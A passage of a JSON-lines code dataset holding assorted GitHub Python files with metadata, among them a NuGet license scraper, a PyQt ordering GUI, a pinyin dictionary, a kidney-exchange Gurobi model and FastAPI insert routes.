"line_number": 30, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 33, 
"usage_type": "attribute"}, {"api_name": "httplib.HTTPSConnection", "line_number": 37, "usage_type": "call"}, {"api_name": "urllib.urlencode", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 68, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 69, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 71, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "29567716903", "text": "from bs4 import BeautifulSoup\r\nimport glob\r\nfrom dependencyCollectorBase import DependencyCollectorBase\r\nimport re\r\nimport requests\r\nfrom random import randint\r\n\r\n\r\nclass NuGetPackageDependencyCollector(DependencyCollectorBase):\r\n license_re = re.compile(r'(.*?)<', re.S)\r\n\r\n def __init__(self, verbose):\r\n super().__init__(verbose=verbose)\r\n self.licenses = []\r\n\r\n def process_nuget_package(self, repo_name, path):\r\n self.print_if_verbose(f'Processing NuGet package dependency file [{path}]')\r\n with open(path, 'r', encoding='utf-8-sig') as file:\r\n content = file.read()\r\n root = BeautifulSoup(content, 'xml')\r\n for element in root.findAll('package'):\r\n name = element['id']\r\n version = element['version']\r\n license = self.retrieve_license(name)\r\n self.dependencies.append(self.build_dependency(repo_name, f'nuget', name, version, license))\r\n\r\n def process_nuget_packages(self, repo_name, path):\r\n for filename in glob.iglob(f'{path}/**/packages.config', recursive=True):\r\n self.process_nuget_package(repo_name, filename)\r\n return self\r\n\r\n def retrieve_license(self, name):\r\n if name == '':\r\n return ''\r\n\r\n matches = list(filter(lambda l: l['name'] == name, self.licenses))\r\n if len(matches) > 0:\r\n return matches[0]['license']\r\n\r\n url = f'https://www.nuget.org/packages/{name}'\r\n response = requests.get(url)\r\n content = response.text\r\n matches = self.license_re.findall(content)\r\n if(len(matches)) > 0:\r\n license = matches[0][1].strip()\r\n link = matches[0][0]\r\n license = f'{license} ({link})'\r\n else:\r\n license = ''\r\n self.licenses.append({'name': name, 'license': license})\r\n return license\r\n", "repo_name": "tobiasb/repository-dependency-collector", "sub_path": "nuGetPackageDependencyCollector.py", "file_name": "nuGetPackageDependencyCollector.py", "file_ext": "py", "file_size_in_byte": 1995, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "dependencyCollectorBase.DependencyCollectorBase", "line_number": 9, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 10, "usage_type": "call"}, {"api_name": "re.S", "line_number": 10, "usage_type": "attribute"}, {"api_name": "bs4.BeautifulSoup", "line_number": 20, "usage_type": "call"}, {"api_name": "glob.iglob", "line_number": 28, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "21197607056", "text": "import sys\n\nfrom PyQt5 import QtCore\nfrom PyQt5.QtGui import QPixmap, QPalette, QIcon\nfrom 
PyQt5.QtWidgets import QApplication, QWidget, QTabWidget, QVBoxLayout, QHBoxLayout, QPushButton, QTextEdit, QLabel, \\\n    QSizePolicy, QHeaderView, QMessageBox, QBoxLayout\nfrom qfluentwidgets import PushButton, LineEdit, TextEdit, ComboBox, InfoBar, InfoBarPosition, MessageBox\n\nfrom cust.dish_widget import MenuWidget\nfrom cust.my_info import My_info\n\nclass MainWindow(QWidget):\n    def __init__(self,cust):\n        super().__init__()\n        self.cust = cust\n        self.initUI()\n    def initUI(self):\n        # create the window layout\n        main_layout = QVBoxLayout()\n        tab_layout = QHBoxLayout()\n\n        # set the window icon\n        self.setWindowIcon(QIcon('C:/Users/User\Desktop\计算机软件综合实验\计算机软件综合实验/navigation/resource/t.png'))\n        # create the tab widget\n        tab_widget = QTabWidget()\n        # rounded styling for the tab bar\n        tab_widget.setStyleSheet(\"QTabBar::tab{width:100px;height:50px;font-size:20px;font-family:'Microsoft YaHei', sans-serif;padding:5px;background-color:rgba(255,255,255,0.3);border-radius: 0px;}\"\n                                 \"QTabBar::tab:hover{background-color:rgba(255,255,255,0.4);padding:5px;font-size:20px;font-family:'Microsoft YaHei', sans-serif;border-radius: 0px;}\"\n                                 \"QTabBar::tab:selected{background-color:rgba(255,255,255,0.6);padding:5px;font-size:20px;font-family:'Microsoft YaHei', sans-serif;blur:10px;border-radius: 0px;}\"\n                                 \"QTabWidget::pane{border:0px solid white;background-color:transparent;}\"\n                                 \"QTabWidget::tab-bar{alignment:center;radius:0px;}\"\n                                 \"QTabWidget::tab-bar{background-color:transparent;}\"\n                                 \"QTabWidget::tab-bar{border:0px solid white;}\"\n                                 \"QTabWidget::tab-bar{margin-left:100px;margin-right:100px;}\"\n                                 \"QTabWidget::tab-bar{margin-top:20px;}\"\n                                 \"QTabWidget::tab-bar{margin-bottom:20px;}\"\n                                 )\n        my_tab = QWidget()\n        my_tab.setStyleSheet(\"background-color: qlineargradient(x1:0, y1:1, x2:1, y2:0,stop:0 rgba(172, 16, 105,240),stop:0.5 rgba(35, 90, 192,240), stop:1 rgba(0, 211, 196,240));\\n\")\n        order_tab = QWidget()\n\n        # create the widgets for the \"My\" tab\n\n        my_layout = QVBoxLayout()\n        my_info = My_info(self.cust)\n        # transparent background\n        my_info.setStyleSheet(\"background-color:transparent\")\n        my_layout.addWidget(my_info)\n\n        my_tab.setLayout(my_layout)\n\n\n        # create the widgets for the ordering tab\n        self.scroll_area = MenuWidget()\n        self.scroll_area.setStyleSheet(\"background-color:transparent;border-radius: 5px;\")\n        order_layout = QVBoxLayout()\n        order_layout.addWidget(self.scroll_area)\n        # rounded corners\n        order_tab.setLayout(order_layout)\n        self.xia_dan = PushButton(\"下单\")\n        self.xia_dan.clicked.connect(self.place_order)\n        order_layout.addWidget(self.xia_dan)\n\n        # add both pages to the tab widget\n        tab_widget.addTab(my_tab, \"我的\")\n        tab_widget.setCurrentIndex(1)\n        tab_widget.addTab(order_tab, \"点餐\")\n\n        # add the tab widget to the main layout\n        tab_layout.addWidget(tab_widget)\n        # rounded corners\n        tab_layout.setContentsMargins(10, 10, 10, 10)\n        main_layout.addLayout(tab_layout)\n\n        # set the main window layout\n        self.setLayout(main_layout)\n        self.setStyleSheet \\\n            (\"background-color: qlineargradient(x1:0, y1:1, x2:1, y2:0,stop:0 rgba(172, 16, 105,240),stop:0.5 rgba(35, 90, 192,240), stop:1 rgba(0, 211, 196,240));\\n\"\n            \"blur: 10px;\\n\")\n        self.setGeometry(600, 200, 600, 800)\n        self.setWindowTitle('点点点点点餐吧')\n        self.show()\n\n    def place_order(self):\n        # run the order-placing logic\n        # todo: implement the real order-placing logic\n        num_items = self.scroll_area.order(self.cust[0])\n        if num_items > 0:\n            InfoBar.success(\n                title='成功',\n                content=f\"您的商品已下单成功!\",\n                orient=QtCore.Qt.Horizontal,\n                isClosable=True,\n                position=InfoBarPosition.TOP,\n                duration=1500, # closes automatically after 1500 ms\n                parent=self,\n\n            )\n            # a payment QR code\n            # todo: implement real payment QR code generation\n            # create a QMessageBox\n            msg_box = QMessageBox()\n            # remove the standard buttons\n            msg_box.setStandardButtons(QMessageBox.NoButton)\n            # set the prompt text and icon\n\n\n            # 
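the payment dialog below is built by hand: a QLabel showing the QR image plus a confirm button inside the QMessageBox\n            # 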
add a QLabel as a custom widget\n            label = QLabel()\n            label.setPixmap(QPixmap(\"../cust/img/qrcode.jpg\").scaledToWidth(300))\n            widget = QWidget()\n            # vertical layout\n            vlayout = QVBoxLayout()\n            vlayout.addWidget(label)\n            paybuttom = PushButton(\"我已付款\")\n            vlayout.addWidget(paybuttom)\n            # clicking the button closes the dialog\n            paybuttom.clicked.connect(msg_box.hide)\n            widget.setLayout(vlayout)\n            msg_box.layout().addWidget(widget)\n            # set the dialog title\n            msg_box.setWindowTitle(\"付款\")\n            # show the QMessageBox\n            msg_box.exec_()\n        else:\n            # pop up a dialog\n            w = MessageBox(\"提示\",\"什么都没选呢!\",self)\n            w.exec_()\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    window = MainWindow()\n    sys.exit(app.exec_())\n", "repo_name": "1EM0NS/CS_Designer", "sub_path": "cust/cust_inter.py", "file_name": "cust_inter.py", "file_ext": "py", "file_size_in_byte": 5703, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 12, "usage_type": "name"}, {"api_name": "cust.dish_widget", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QIcon", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTabWidget", "line_number": 25, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 40, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 44, "usage_type": "call"}, {"api_name": "cust.my_info.My_info", "line_number": 45, "usage_type": "call"}, {"api_name": "cust.dish_widget.MenuWidget", "line_number": 54, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 56, "usage_type": "call"}, {"api_name": "qfluentwidgets.PushButton", "line_number": 60, "usage_type": "call"}, {"api_name": "qfluentwidgets.InfoBar.success", "line_number": 89, "usage_type": "call"}, {"api_name": "qfluentwidgets.InfoBar", "line_number": 89, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 92, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 92, "usage_type": "name"}, {"api_name": "qfluentwidgets.InfoBarPosition.TOP", "line_number": 94, "usage_type": "attribute"}, {"api_name": "qfluentwidgets.InfoBarPosition", "line_number": 94, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 102, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.NoButton", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 110, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 112, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 114, "usage_type": "call"}, {"api_name": "qfluentwidgets.PushButton", "line_number": 116, "usage_type": "call"}, {"api_name": "qfluentwidgets.MessageBox", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 131, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 131, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 133, "usage_type": "call"}]} +{"seq_id": "29353514899", "text": "from pypinyin import 
lazy_pinyin\r\nfrom TrieTree import TrieTree\r\n\r\n\r\ndef is_Chinese(word):\r\n\r\n    for ch in word:\r\n\r\n        if '\\u4e00' <= ch <= '\\u9fff':\r\n\r\n            return True\r\n\r\n    return False\r\n\r\n\r\n# build a dictionary from the characters and their pinyin\r\n# pinyin -- {character - frequency}\r\ndef pinyinDict(input):\r\n    str = []\r\n    tree = TrieTree('tree')\r\n    output = {}\r\n    for i in range(len(input)):\r\n        if is_Chinese(input[i]):\r\n\r\n            pinyin = lazy_pinyin(input[i])[0]\r\n            str += pinyin\r\n            if pinyin not in output:\r\n                output[pinyin] = {}\r\n            tree.insert(pinyin)\r\n            if input[i][0] not in output[pinyin]:\r\n                output[pinyin][input[i][0]] = 0\r\n            output[pinyin][input[i][0]] += 1\r\n    for k in output:\r\n        sum = 0\r\n        for kk in output[k]:\r\n            sum += output[k][kk]\r\n        for kk in output[k]:\r\n            output[k][kk] /= sum\r\n    # print(str)\r\n    return output, tree\r\n\r\n\r\n'''\r\nx = [\"我\", \"去\", \"上\", \"学\"]\r\nprint(pinyinDict(x))\r\n'''\r\n", "repo_name": "huangliu0909/Pinyin-Chinese-character-conversion", "sub_path": "PinyinDict.py", "file_name": "PinyinDict.py", "file_ext": "py", "file_size_in_byte": 1033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "TrieTree.TrieTree", "line_number": 20, "usage_type": "call"}, {"api_name": "pypinyin.lazy_pinyin", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "9174461062", "text": "# -*- coding:utf-8 -*-\n# Author: xiayouran\n# Email: youran.xia@foxmail.com\n# Datetime: 2023/6/29 10:54\n# Filename: evaluate.py\nimport imageio\nimport numpy as np\nimport multiprocessing as mp\nimport time\n\nfrom clean_watermark import CleanWater\n\n\ndef calculate_time(num_executions=10):\n    def decorator(func):\n        def wrapper(*args, **kwargs):\n            total_time = np.zeros(shape=num_executions)\n            for i in range(num_executions):\n                start_time = time.time()\n                func(*args, **kwargs)\n                end_time = time.time()\n                execution_time = end_time - start_time\n                total_time[i] = execution_time\n                print(\"The function [{}] run time: {:.4f} s\".format(func.__name__, execution_time))\n\n            print(\"The function [{}] run average time: {:.4f} s\".format(func.__name__, total_time[1:-1].mean()))\n\n        return wrapper\n\n    return decorator\n\n\n@calculate_time(num_executions=10)\ndef clean_watermark_no_multiprocess():\n    img_file = 'imgs/logo-watermark.jpg'\n    img_data = imageio.imread(img_file)\n    height, width, channel = img_data.shape\n\n    if channel == 3:\n        fill_color = np.asarray([254, 255, 255], dtype=np.uint8)\n    else:\n        fill_color = np.asarray([254, 255, 255, 255], dtype=np.uint8)\n\n    for i in range(height):\n        for j in range(width):\n            rgb_data = img_data[i, j]\n            if CleanWater.rgb2hex(rgb_data) in CleanWater.watermark_color:\n                img_data[i, j] = fill_color\n\n    imageio.imsave('imgs/logo.png', img_data)\n\n\n@calculate_time(num_executions=10)\ndef clean_watermark_with_multiprocess():\n    img_file = 'imgs/logo-watermark.jpg'\n    img_data = imageio.imread(img_file)\n    cpu_num = mp.cpu_count()\n    img_blocks = CleanWater.split_img(img_data)\n\n    pool = mp.Pool(processes=cpu_num)\n    img_blocks = pool.map(CleanWater.clean_water, img_blocks)\n    img_data_clean = CleanWater.merge_img(img_blocks)\n\n    assert img_data_clean.shape == img_data.shape, 'img_data_clean and img_data must have the same shape'\n\n    imageio.imsave('imgs/logo.png', img_data_clean)\n\n\nif __name__ == '__main__':\n    clean_watermark_no_multiprocess()\n    clean_watermark_with_multiprocess()\n", "repo_name": "xiayouran/CleanWatermark", "sub_path": "evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 2221, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 19, "usage_type": "call"}, {"api_name": "time.time", "line_number": 21, "usage_type": "call"}, {"api_name": "imageio.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 42, "usage_type": "attribute"}, {"api_name": "clean_watermark.CleanWater.rgb2hex", "line_number": 47, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater", "line_number": 47, "usage_type": "name"}, {"api_name": "clean_watermark.CleanWater.watermark_color", "line_number": 47, "usage_type": "attribute"}, {"api_name": "imageio.imsave", "line_number": 50, "usage_type": "call"}, {"api_name": "imageio.imread", "line_number": 56, "usage_type": "call"}, {"api_name": "multiprocessing.cpu_count", "line_number": 57, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater.split_img", "line_number": 58, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater", "line_number": 58, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 60, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater.clean_water", "line_number": 61, "usage_type": "attribute"}, {"api_name": "clean_watermark.CleanWater", "line_number": 61, "usage_type": "name"}, {"api_name": "clean_watermark.CleanWater.merge_img", "line_number": 62, "usage_type": "call"}, {"api_name": "clean_watermark.CleanWater", "line_number": 62, "usage_type": "name"}, {"api_name": "imageio.imsave", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "36160274848", "text": "from collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef calD(n):\n return (2*n)%10000\n\n\ndef calS(n):\n return (n+10000-1)%10000\n\n\ndef calL(n):\n return (n%1000)*10+(n//1000)\n\n\ndef calR(n):\n return (n%10)*1000+(n//10)\n\n\ndef bfs(a, b):\n queue = deque()\n queue.append((a, \"\"))\n v = [False for _ in range(10000)] # 0부터 9999까지 등장한 숫자는 True\n v[a] = True\n\n while queue:\n reg, res = queue.popleft() # 레지스터 값, 연산 과정\n if reg == b:\n print(res)\n return\n \n d, s, l, r = calD(reg), calS(reg), calL(reg), calR(reg) # 연산한 값\n if not v[d]:\n queue.append((d, res+\"D\"))\n v[d] = True\n if not v[s]:\n queue.append((s, res+\"S\"))\n v[s] = True\n if not v[l]:\n queue.append((l, res+\"L\"))\n v[l] = True\n if not v[r]:\n queue.append((r, res+\"R\"))\n v[r] = True\n \n\ndef solution():\n A, B = map(int, input().split())\n bfs(A, B)\n \n\nT = int(input())\nfor _ in range(T):\n solution()", "repo_name": "parkyolo/Algorithm", "sub_path": "Baekjoon/DFSBFS/G4_9019_DSLR/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 1118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.stdin", "line_number": 3, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "1704180430", "text": "import datetime\nfrom signal import alarm\nfrom playsound import playsound\nalarmhour=int(input(\"enter hour\"))\nalarmmin=int(input(\"enter min\"))\nalarmAm=input(\"am/pm:-\")\nif alarmAm==\"pm\":\n alarmhour+=12\nelif 
alarmAm==\"am\":\n alarmhour-=12\nwhile True:\n if alarmhour==datetime.datetime.now().hour and alarmmin==datetime.datetime.now().minute:\n print(\"playing sound using playsound\")\n print(\"playing....\")\n playsound('/home/shivani/Downloads/ringtone')\n break\n", "repo_name": "shivanikarve/alarm_clock", "sub_path": "alarm clock .py", "file_name": "alarm clock .py", "file_ext": "py", "file_size_in_byte": 490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "datetime.datetime.now", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "attribute"}, {"api_name": "playsound.playsound", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "985070975", "text": "from typing import List\ndef bubble_sort(A:List[int])->List[int]:\n n=len(A)\n for i in range(n-1):\n for j in range(n-i-1):\n if A[j]>A[j+1]: A[j],A[j+1]=A[j+1],A[j]\n return A\n\nimport random\nA = [random.randint(1,100) for i in range(10)]\nprint(A)\nprint(bubble_sort(A))\n", "repo_name": "kangdaeki/python", "sub_path": "bubble_sort.py", "file_name": "bubble_sort.py", "file_ext": "py", "file_size_in_byte": 292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 2, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "34115656960", "text": "import numpy as np\nimport gurobipy as gp\nfrom gurobipy import GRB\n\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom KEP_instance import *\nfrom KEP_solution import *\n\n\n\ndef get_cycles(I):\n \"\"\"\n given an instance I, generatate all cycles of size K or less\n makes use of symmetry reduction\n \"\"\"\n\n\n ### create floyd matrix\n floyd = np.full((I.n, I.n), I.n) # initialize matrix\n for i in I.adj_list: \n for j in I.adj_list[i]:\n floyd[i,j] = 1 # set direct neighbors distance to 1\n\n for i in range(I.n):\n for j in range(I.n):\n for k in range(I.n):\n floyd[j,k] = min(floyd[j,k], floyd[j,i] + floyd[i,k])\n\n\n ### find cycles\n C = []\n\n for i in range(I.n): # i = starting node cycle\n curC = [[i]] # current cycle list\n for j in range(1, I.K+1): # j = length current cycle\n newC = [] # new cycle list\n for k in range(len(curC)): # k loops over current cycles (to extend them and possible add them to C)\n for l in range(len(I.adj_list[curC[k][-1]])): # l loops over neighbors\n if I.adj_list[curC[k][-1]][l] >= i:\n if I.adj_list[curC[k][-1]][l] == i: # add if cycle complete\n C.append(curC[k][:])\n else: # else continue exploring\n if floyd[I.adj_list[curC[k][-1]][l],i] <= I.K - j:\n add = True\n for m in range(1, j):\n if curC[k][m] == I.adj_list[curC[k][-1]][l]:\n add = False\n break\n if add:\n newC.append(curC[k][:])\n newC[-1].append(I.adj_list[curC[k][-1]][l])\n curC = newC\n\n return C\n\n\n\ndef CF(I):\n \"\"\"\n given an instance I, solves the KEP using the cycle formulation\n \"\"\"\n\n\n C = get_cycles(I) # determine set of cycles\n\n ### create model\n m = gp.Model(f'KEP cycle formulation {I.filename}')\n gp.setParam('LogFile', 'Logfiles/gurobi_cf.log')\n m.ModelSense = GRB.MAXIMIZE\n\n ### variables\n bin_vars = [] # Create a list to store the binary variables to use them in constraint later\n for i,c in enumerate(C):\n x = m.addVar(vtype = GRB.BINARY, obj = len(c), name = f'x_{i}')\n bin_vars.append(x)\n\n ### 
constraints\n expressions = [ [] for _ in range(I.n) ] # using expression list avoids having extra if statement: no \"if node in c\" is needed\n for i,c in enumerate(C):\n for node in c:\n expressions[node].append(bin_vars[i])\n for expression in expressions:\n if len(expression) > 1:\n m.addConstr(sum(expression) <= 1)\n\n ### solve model\n # m.write(\"model.lp\")\n # m.setParam('OutputFlag', False)\n m.optimize()\n\n ### make solution class\n solution = KEP_solution(I)\n solution.formulation = 'CF'\n solution.optimality = m.Status == GRB.OPTIMAL\n solution.runtime = m.Runtime\n solution.num_vars = m.NumVars\n solution.num_constrs = m.NumConstrs\n solution.num_nonzero = m.NumNZs\n solution.LB = m.ObjVal # best lower bound (= objective value current solution)\n solution.UB = m.ObjBound # best upper bound\n solution.gap = m.MIPGap # optimality gap\n\n ### determine chosen cycles (for ao feasibility check)\n solution.C = C\n solution.indices = [v.index for v in m.getVars() if v.x > 0.5]\n\n ### solve relaxation\n m_relax = m.relax()\n m_relax.optimize()\n solution.CUB = m_relax.ObjVal # continuous upper bound\n\n return solution\n\n", "repo_name": "pimmie001/MSc-Thesis-BAOR", "sub_path": "CYCLE/CF.py", "file_name": "CF.py", "file_ext": "py", "file_size_in_byte": 3778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.path.append", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.full", "line_number": 20, "usage_type": "call"}, {"api_name": "gurobipy.Model", "line_number": 68, "usage_type": "call"}, {"api_name": "gurobipy.setParam", "line_number": 69, "usage_type": "call"}, {"api_name": "gurobipy.GRB.MAXIMIZE", "line_number": 70, "usage_type": "attribute"}, {"api_name": "gurobipy.GRB", "line_number": 70, "usage_type": "name"}, {"api_name": "gurobipy.GRB.BINARY", "line_number": 75, "usage_type": "attribute"}, {"api_name": "gurobipy.GRB", "line_number": 75, "usage_type": "name"}, {"api_name": "gurobipy.GRB.OPTIMAL", "line_number": 95, "usage_type": "attribute"}, {"api_name": "gurobipy.GRB", "line_number": 95, "usage_type": "name"}]} +{"seq_id": "7191869374", "text": "from fastapi import APIRouter\nfrom sqlalchemy import insert\n# from models import *\nfrom . 
import pydantic_models\nimport db\n\n### \n# TO DO\n# add validation of the input data\n# staff\n# dog\n# course\n# lesson\n# type_of_lesson\n# adv\n###\n\n\npost_router = APIRouter() \n\n\n@post_router.post(\"/type_of_lesson/\")\nasync def create_type_of_lesson(type_of_lesson: pydantic_models.TypesOfLesson):\n    # type_of_lesson.dict() - values to insert\n    type_of_lesson = type_of_lesson.dict()\n    # del id, so SQLAlchemy won't complain\n    del type_of_lesson['id']\n\n    # insert into table\n    query = insert(db.typesOfLesson)\n    result = await db.database.execute(query, type_of_lesson)\n    return result\n\n\n@post_router.post(\"/dog/\")\nasync def create_dog(dog: pydantic_models.Dogs):\n    dog = dog.dict()\n    del dog['id']\n\n    query = insert(db.dogs)\n    result = await db.database.execute(query, dog)\n    return result\n\n\n@post_router.post(\"/userdog/\")\nasync def create_userdog(userdog: pydantic_models.UserDog):\n    userdog = userdog.dict()\n    del userdog['id']\n\n    query = insert(db.userDog)\n    result = await db.database.execute(query, userdog)\n    return result\n\n\n@post_router.post(\"/lesson/\")\nasync def create_lesson(lesson: pydantic_models.Lessons):\n    lesson = lesson.dict()\n    del lesson['id']\n\n    query = insert(db.lessons)\n    result = await db.database.execute(query, lesson)\n    return result\n\n\n@post_router.post(\"/staff/\")\nasync def create_staff(staff: pydantic_models.Staff):\n    staff = staff.dict()\n    del staff['id']\n\n    query = insert(db.staff)\n    result = await db.database.execute(query, staff)\n    return result\n\n\n@post_router.post(\"/place/\")\nasync def create_place(place: pydantic_models.Places):\n    place = place.dict()\n    del place['id']\n\n    query = insert(db.places)\n    result = await db.database.execute(query, place)\n    return result\n\n\n@post_router.post(\"/adv/\")\nasync def create_adv(adv: pydantic_models.Advertisements):\n    adv = adv.dict()\n    del adv['id']\n\n    query = insert(db.advertisements)\n    result = await db.database.execute(query, adv)\n    return result\n\n\n@post_router.post(\"/user/\")\nasync def create_user(user: pydantic_models.Users):\n    user = user.dict()\n    del user['id']\n\n    query = insert(db.users)\n    result = await db.database.execute(query, user)\n    return result\n\n\n@post_router.post(\"/course/\")\nasync def create_course(course: pydantic_models.Courses):\n    course = course.dict()\n    del course['id']\n\n    query = insert(db.courses)\n    result = await db.database.execute(query, course)\n    return result\n\n\n@post_router.post(\"/dogcourse/\")\nasync def create_dogcourse(dogcourse: pydantic_models.DogCourse):\n    dogcourse = dogcourse.dict()\n    del dogcourse['id']\n\n    query = insert(db.dogCourse)\n    result = await db.database.execute(query, dogcourse)\n    return result\n\n\n@post_router.post(\"/session/\")\nasync def create_session(session: pydantic_models.Sessions):\n    session = session.dict()\n    del session['id']\n\n    query = insert(db.sessions)\n    result = await db.database.execute(query, session)\n    return result", "repo_name": "Shemyako/crud_server_diploma_rebuild", "sub_path": "app/router/post.py", "file_name": "post.py", "file_ext": "py", "file_size_in_byte": 3101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "fastapi.APIRouter", "line_number": 19, "usage_type": "call"}, {"api_name": "sqlalchemy.insert", "line_number": 30, "usage_type": "call"}, {"api_name": "db.typesOfLesson", "line_number": 30, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 31, "usage_type": "call"}, 
{"api_name": "db.database", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 40, "usage_type": "call"}, {"api_name": "db.dogs", "line_number": 40, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 41, "usage_type": "call"}, {"api_name": "db.database", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 50, "usage_type": "call"}, {"api_name": "db.userDog", "line_number": 50, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 51, "usage_type": "call"}, {"api_name": "db.database", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 60, "usage_type": "call"}, {"api_name": "db.lessons", "line_number": 60, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 61, "usage_type": "call"}, {"api_name": "db.database", "line_number": 61, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 70, "usage_type": "call"}, {"api_name": "db.staff", "line_number": 70, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 71, "usage_type": "call"}, {"api_name": "db.database", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 80, "usage_type": "call"}, {"api_name": "db.places", "line_number": 80, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 81, "usage_type": "call"}, {"api_name": "db.database", "line_number": 81, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 90, "usage_type": "call"}, {"api_name": "db.advertisements", "line_number": 90, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 91, "usage_type": "call"}, {"api_name": "db.database", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sqlalchemy.insert", "line_number": 100, "usage_type": "call"}, {"api_name": "db.users", "line_number": 100, "usage_type": "attribute"}, {"api_name": "db.database.execute", "line_number": 101, "usage_type": "call"}, {"api_name": "db.database", "line_number": 